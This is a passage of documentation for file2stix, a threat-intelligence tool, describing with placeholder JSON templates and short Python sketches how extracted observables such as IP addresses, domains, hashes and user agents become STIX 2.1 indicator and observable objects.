"extension-definition--16b114d1-371d-4587-ba7d-03d0e5cf71cf": {
"extension_type": "property-extension",
"extraction_information": {
"type": "<REGEX OR LOOKUP>",
"location": "<DEFAULT OR LOCAL>",
"file": "<FILENAME OF EXTRACTION>",
"positions": [
{
"start_position": "<LOCATION OF FIRST CHARACTER>",
"end_position": "<LOCATION OF LAST CHARACTER>"
},
{
"start_position": "<LOCATION OF FIRST CHARACTER>",
"end_position": "<LOCATION OF LAST CHARACTER>"
}
]
}
}
}
}
STIX 2.1 Object creation logic for extractions
file2stix uses the STIX2 Python library for all STIX 2.1 object generation (except for ATT&CK and CAPEC).
Generally speaking, but not in every case, an extraction will create 4 things:
1. An SDO (with an SCO in the pattern)
2. A corresponding SCO (from the SDO)
3. An SRO (between SCO [2.] and SDO [1.])
4. An SRO (between SDO [1.] and the Report for the input (see part 1))
As mentioned, SCOs are created from Patterns in SDOs, e.g. [ipv4-addr:value='1.1.1.1'] becomes an SCO of "type": "ipv4-addr" with a "value": "1.1.1.1".
That means that any extracted observable with the same type and value (e.g. ipv4-addr + 1.1.1.1) will have the same id whatever the SDO it was generated from (because the STIX2 library uses these two values to generate the UUIDv5). This makes it possible to create links between uploaded reports using shared SCOs.
This only applies to SCOs. All SROs and SDOs (created by file2stix) will have unique ids because they are generated using random UUIDv4s.
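The difference between the two id schemes can be shown with Python's uuid module. The sketch below is a simplified approximation of what the STIX2 library does: the namespace is the one defined by the STIX 2.1 specification for SCO ids, but json.dumps with sorted keys stands in for the JSON canonicalisation the specification requires, so the exact ids may differ from the library's output. The function names are hypothetical.

```python
import json
import uuid

# Namespace defined by the STIX 2.1 specification for deterministic SCO ids.
STIX_SCO_NAMESPACE = uuid.UUID("00abedb4-aa42-466c-9c01-fed23315a9b7")


def sco_id(sco_type, contributing_properties):
    """Derive a deterministic (UUIDv5) id from an SCO's contributing properties.

    Simplification: sorted, compact json.dumps output is used in place of
    full JSON canonicalisation.
    """
    name = json.dumps(contributing_properties, sort_keys=True, separators=(",", ":"))
    return f"{sco_type}--{uuid.uuid5(STIX_SCO_NAMESPACE, name)}"


def sdo_id(sdo_type):
    """SDOs and SROs get a random UUIDv4, so every call yields a new id."""
    return f"{sdo_type}--{uuid.uuid4()}"


# Same type and value: same id, regardless of which report it came from.
print(sco_id("ipv4-addr", {"value": "1.1.1.1"}) == sco_id("ipv4-addr", {"value": "1.1.1.1"}))
# Two indicators for the same value still receive different ids.
print(sdo_id("indicator") == sdo_id("indicator"))
```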
Note on error handling
It’s important to note that, if you use custom regex or lookup extractions, the value you’re searching for must map properly to the STIX objects described below. For example, if you map a domain extraction (e.g. example.com) to an IPv4 Object you will receive an error.
By default, file2stix will hard handle errors; that is, any error causes the extraction to fail. As soon as an error is seen the job is aborted and there will be no output, so you must fix what is causing the error and rerun the job.
You can explicitly set file2stix to soft handle errors; that is, it reports them in the logs and ignores the extraction/object creation that fails, but still continues with the extraction of other objects.
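The two modes differ only in what happens when object creation fails. Here is a minimal Python sketch of that control flow. The function name and the error_handling argument are hypothetical, and the standard library's ipaddress module stands in for the validation that happens during STIX object creation.

```python
import ipaddress
import logging

logger = logging.getLogger("extraction-sketch")


def build_ipv4_objects(values, error_handling="hard"):
    """Validate each value as IPv4: abort on error (hard) or log and skip (soft)."""
    objects = []
    for value in values:
        try:
            ipaddress.IPv4Address(value)
        except ValueError as error:
            if error_handling == "hard":
                raise  # abort the whole job, so no output is produced
            logger.warning("skipping %r: %s", value, error)
            continue
        objects.append({"type": "ipv4-addr", "value": value})
    return objects
```

With soft handling, a domain wrongly mapped to IPv4 is logged and skipped while the valid values are still returned. With hard handling, the same input raises and nothing is returned.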
1.1 IPv4 Address (IPv4Only and IPv4CIDR)
Creates STIX 2.1 objects:
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv4: <EXTRACTED IPV4 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv4-addr:value = '<EXTRACTED IPV4 OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv4-addr SCO
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV4 OBSERVABLE VALUE>"
}
1.2 IPv4 Address Observables with port (IPv4Port)
Creates STIX 2.1 objects:
- indicator (with relationship to report)
- ipv4-addr (with relationship to indicator)
- network-traffic (with relationship to indicator)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv4: <EXTRACTED IPV4 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv4-addr:value = '<EXTRACTED IPV4 OBSERVABLE VALUE>' AND network-traffic:dst_port = '<EXTRACTED IPV4 PORT VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv4-addr and network-traffic SCO
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV4 OBSERVABLE VALUE>"
}
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--<GENERATED BY STIX2 LIBRARY>",
"dst_ref": "ipv4-addr--<IPV4 OBJECT ID>",
"dst_port": "<EXTRACTED IPV4 PORT VALUE>",
"protocols": [
"ipv4"
]
}
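As a rough illustration of the IPv4Port mapping, the sketch below splits an extracted `address:port` string and fills in the indicator pattern template. The function names are hypothetical and this is not file2stix's own code; it only assumes the extracted value has the form `<IPV4>:<PORT>`.

```python
import ipaddress
from typing import Tuple


def split_ipv4_port(observable: str) -> Tuple[str, int]:
    """Split 'address:port' into a validated IPv4 address and port number."""
    address, _, port_text = observable.rpartition(":")
    ipaddress.IPv4Address(address)  # raises ValueError on an invalid address
    port = int(port_text)           # raises ValueError on a non-numeric port
    if not 0 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return address, port


def ipv4_port_pattern(address: str, port: int) -> str:
    """Fill in the indicator pattern template used for IPv4Port extractions."""
    return (
        f"[ ipv4-addr:value = '{address}' "
        f"AND network-traffic:dst_port = '{port}' ]"
    )


address, port = split_ipv4_port("198.51.100.7:8080")
print(ipv4_port_pattern(address, port))
```

The address part would populate the ipv4-addr SCO and the port the dst_port of the network-traffic SCO.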
2.1 IPv6 Observables (IPv6Only and IPv6CIDR)
Creates STIX 2.1 objects:
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv6: <EXTRACTED IPV6 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv6-addr:value = '<EXTRACTED IPV6 OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv6-addr SCO
{
"type": "ipv6-addr",
"spec_version": "2.1",
"id": "ipv6-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV6 OBSERVABLE VALUE>"
}
2.2 IPv6 Observables with port (IPv6Port)
Creates STIX 2.1 objects:
- indicator (with relationship to report)
- ipv6-addr (with relationship to indicator)
- network-traffic (with relationship to indicator)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv6: <EXTRACTED IPV6 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv6-addr:value = '<EXTRACTED IPV6 OBSERVABLE VALUE WITH [] REMOVED>' AND network-traffic:dst_port = '<EXTRACTED IPV6 PORT VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv6-addr and network-traffic SCO
{
"type": "ipv6-addr",
"spec_version": "2.1",
"id": "ipv6-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV6 OBSERVABLE VALUE>"
}
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--<GENERATED BY STIX2 LIBRARY>",
"dst_ref": "ipv6-addr--<IPV6 OBJECT ID>",
"dst_port": "<EXTRACTED IPV6 PORT VALUE>",
"protocols": [
"ipv6"
]
}
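The IPv6Port pattern uses the address with its square brackets removed. A minimal sketch of that step, assuming the extracted value looks like `[<IPV6>]:<PORT>` (the regular expression and function name here are illustrative, not taken from file2stix):

```python
import ipaddress
import re
from typing import Tuple

# Hypothetical shape of a bracketed IPv6 address followed by a port.
BRACKETED_IPV6_PORT = re.compile(
    r"^\[(?P<address>[0-9A-Fa-f:.]+)\]:(?P<port>\d{1,5})$"
)


def split_ipv6_port(observable: str) -> Tuple[str, int]:
    """Return (address without brackets, port) for '[address]:port'."""
    match = BRACKETED_IPV6_PORT.match(observable)
    if match is None:
        raise ValueError(f"not a bracketed IPv6 address with port: {observable!r}")
    address = match.group("address")
    ipaddress.IPv6Address(address)  # raises ValueError on an invalid address
    port = int(match.group("port"))
    if port > 65535:
        raise ValueError(f"port out of range: {port}")
    return address, port


address, port = split_ipv6_port("[2001:db8::1]:443")
print(f"[ ipv6-addr:value = '{address}' AND network-traffic:dst_port = '{port}' ]")
```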
3. Domain Name Observables (DomainNameOnly and DomainNameSub)
- indicator (with relationship to report)
- domain-name (with relationship to indicator)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Domain: <EXTRACTED DOMAIN NAME OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ domain-name:value = '<EXTRACTED DOMAIN NAME OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 domain-name SCO
{
"type": "domain-name",
"spec_version": "2.1",
"id": "domain-name--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED DOMAIN NAME VALUE>"
}
4. URL Observables (URLFull and URLPart)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "URL: <EXTRACTED URL OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ url:value = '<EXTRACTED URL OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 url SCO
{
"type": "url",
"spec_version": "2.1",
"id": "url--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED URL VALUE>"
}
5. File Name Observables (FileName)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "File name: <EXTRACTED FILE NAME OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ file:name = '<EXTRACTED FILE NAME OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 file SCO
{
"type": "file",
"spec_version": "2.1",
"id": "file--<GENERATED BY STIX2 LIBRARY>",
"name": "<EXTRACTED FILE NAME VALUE>"
}
6. Directory Path Observables (DirectoryPathWindows and DirectoryPathUNIX)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Directory: <EXTRACTED DIRECTORY OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ directory:path = '<EXTRACTED DIRECTORY OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 directory SCO
{
"type": "directory",
"spec_version": "2.1",
"id": "directory--<GENERATED BY STIX2 LIBRARY>",
"path": "<EXTRACTED DIRECTORY OBSERVABLE VALUE>"
}
5/6. Filename and filepath
If a filename and file path are detected in the same string (e.g. /path/to/file.txt extracts /path/to/ and file.txt) then an additional SRO is created to denote their relationship, as follows;
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<SIGNALS CORPS IDENTITY ID>",
"created": "<REPORT CREATED DATE>",
"modified": "<REPORT CREATED DATE>",
"relationship_type": "file-path",
"source_ref": "file--<FILE OBJECT>",
"target_ref": "directory--<DIRECTORY OBJECT>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
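To make the split concrete, here is a small sketch of how a combined path could be divided into its directory and file name, and how the core of the linking SRO might be assembled. The helper names and placeholder IDs are hypothetical; the real objects also carry the id, timestamps, markings and external references shown in the relationship object.

```python
from typing import Tuple


def split_path(path: str) -> Tuple[str, str]:
    """Split a UNIX or Windows path into (directory with trailing separator, file name)."""
    index = max(path.rfind("/"), path.rfind("\\"))
    if index == -1:
        return "", path  # no separator: file name only
    return path[: index + 1], path[index + 1 :]


def file_path_relationship(file_id: str, directory_id: str) -> dict:
    """Core properties of the SRO linking a file SCO to its directory SCO."""
    return {
        "type": "relationship",
        "spec_version": "2.1",
        "relationship_type": "file-path",
        "source_ref": file_id,
        "target_ref": directory_id,
    }


directory, filename = split_path("/path/to/file.txt")
print(directory, filename)
print(file_path_relationship("file--<FILE OBJECT>", "directory--<DIRECTORY OBJECT>"))
```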
7. File Hashes (indicator)
Here is how file hashes are represented in STIX 2.1 by file2stix (note, <FILE HASH TYPE> is one of MD5, SHA-1, SHA-256, SHA-512, SHA3-256, SHA3-512, or SSDEEP);
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "<FILE HASH TYPE>: <EXTRACTED FILE HASH OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ file:hashes.<FILE HASH TYPE> = '<EXTRACTED FILE HASH OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 file SCO
{
"type": "file",
"spec_version": "2.1",
"id": "file--<GENERATED BY STIX2 LIBRARY>",
"hashes": {
"<FILE HASH TYPE>": "<EXTRACTED FILE HASH OBSERVABLE VALUE>"
}
}
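One practical wrinkle with hash extraction is that several of the supported hash types share a digest length, so length alone cannot always decide the `<FILE HASH TYPE>`. The sketch below is only an illustration of that ambiguity, not file2stix's detection logic; SSDEEP is left out because it is not a plain hexadecimal digest.

```python
import hashlib
import re
from typing import List

HEX_ONLY = re.compile(r"^[0-9a-fA-F]+$")

# Hex digest length -> hash types from the list above that produce it.
CANDIDATES_BY_LENGTH = {
    32: ["MD5"],
    40: ["SHA-1"],
    64: ["SHA-256", "SHA3-256"],
    128: ["SHA-512", "SHA3-512"],
}


def candidate_hash_types(value: str) -> List[str]:
    """Return every hash type whose hex digest length matches the value."""
    if not HEX_ONLY.match(value):
        return []
    return list(CANDIDATES_BY_LENGTH.get(len(value), []))


digest = hashlib.sha256(b"example").hexdigest()
print(candidate_hash_types(digest))
```

Where two candidates are returned, additional context (for example a label next to the hash in the source text) would be needed to pick one.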
8. Email Address Observables (EmailAddress)
- indicator (with relationship to report)
- email-addr (with relationship to indicator)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Email Address: <EXTRACTED EMAIL ADDRESS OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ email-addr:value = '<EXTRACTED EMAIL ADDRESS OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 email-addr SCO
{
"type": "email-addr",
"spec_version": "2.1",
"id": "email-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED EMAIL ADDRESS OBSERVABLE VALUE>"
}
9. MAC Address Observables (MacAddress)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "MAC Address: <EXTRACTED MAC ADDRESS OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ mac-addr:value = '<EXTRACTED MAC ADDRESS OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 mac-addr SCO
{
"type": "mac-addr",
"spec_version": "2.1",
"id": "mac-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED MAC ADDRESS OBSERVABLE VALUE>"
}
10. Windows Registry Key Observables (WindowsRegistryKey)
- indicator (with relationship to report)
- windows-registry-key (with relationship to indicator)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Windows Registry Key: <EXTRACTED WINDOWS REGISTRY KEY OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ windows-registry-key:key = '<EXTRACTED WINDOWS REGISTRY KEY OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 windows-registry-key SCO
{
"type": "windows-registry-key",
"spec_version": "2.1",
"id": "windows-registry-key--<GENERATED BY STIX2 LIBRARY>",
"key": "<EXTRACTED WINDOWS REGISTRY KEY OBSERVABLE VALUE>"
}
11. User Agent Observables (UserAgent)
- indicator (with relationship to report)
- user-agent (with relationship to indicator)
- extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an object for user agents, file2stix uses a custom SCO;
https://github.com/signalscorps/stix2-objects/blob/main/extension-definition/new-sco/user-agent/
STIX 2.1 user-agent SCO
{
"type": "user-agent",
"spec_version": "2.1",
"id": "user-agent--<GENERATED BY STIX2 LIBRARY>",
"string": "<EXTRACTED FULL USER AGENT STRING>",
"extensions": {
"extension-definition--6cea4dc9-9517-44b8-b021-ae82e2f1de43" : {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "User Agent: <EXTRACTED FULL USER AGENT STRING>",
"pattern_type": "stix",
"pattern": "[ user-agent:string = '<EXTRACTED FULL USER AGENT STRING>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
12. Autonomous System Number Observables (AutonomousSystemNumber)
- indicator (with relationship to report)
- autonomous-system (with relationship to indicator)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "AS<EXTRACTED NUMERICAL AS OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ autonomous-system:number = '<EXTRACTED NUMERICAL AS OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 autonomous-system SCO
{
"type": "autonomous-system",
"spec_version": "2.1",
"id": "autonomous-system--<GENERATED BY STIX2 LIBRARY>",
"number": "<EXTRACTED NUMERICAL AS OBSERVABLE VALUE>"
}
13. Cryptocurrency Observables (CryptocurrencyBTC, CryptocurrencyETH, and CryptocurrencyXMR)
- indicator (with relationship to report)
- cryptocurrency-transaction (with relationship to indicator)
- extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an object for cryptocurrency, file2stix uses a custom SCO;
https://github.com/signalscorps/stix2-objects/blob/main/extension-definition/new-sco/cryptocurrency-transaction
STIX 2.1 cryptocurrency transaction SCO
{
"type": "cryptocurrency-transaction",
"spec_version": "2.1",
"id": "cryptocurrency-transaction--<GENERATED BY STIX2 LIBRARY>",
"currency_symbol": "<DETECTED CURRENCY TYPE>",
"address": "<EXTRACTED CRYPTOCURRENCY OBSERVABLE VALUE>",
"extensions": {
"extension-definition--532ae28d-137b-4b89-afb7-9cf9b504191b" : {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "<CRYPTO TYPE> Transaction: <EXTRACTED CRYPTOCURRENCY OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ cryptocurrency-transaction:address = '<EXTRACTED CRYPTOCURRENCY OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
14. CVE Observables (CVE)
All STIX objects reported by the cve2stix API for the CVE ID are imported to file2stix;
GET https://www.cve2stix.com/api/v1/cve/<CVE ID>
The indicator object returned in the CVE response should have a relationship generated by file2stix to the report.
15. CPE Observables (CPE)
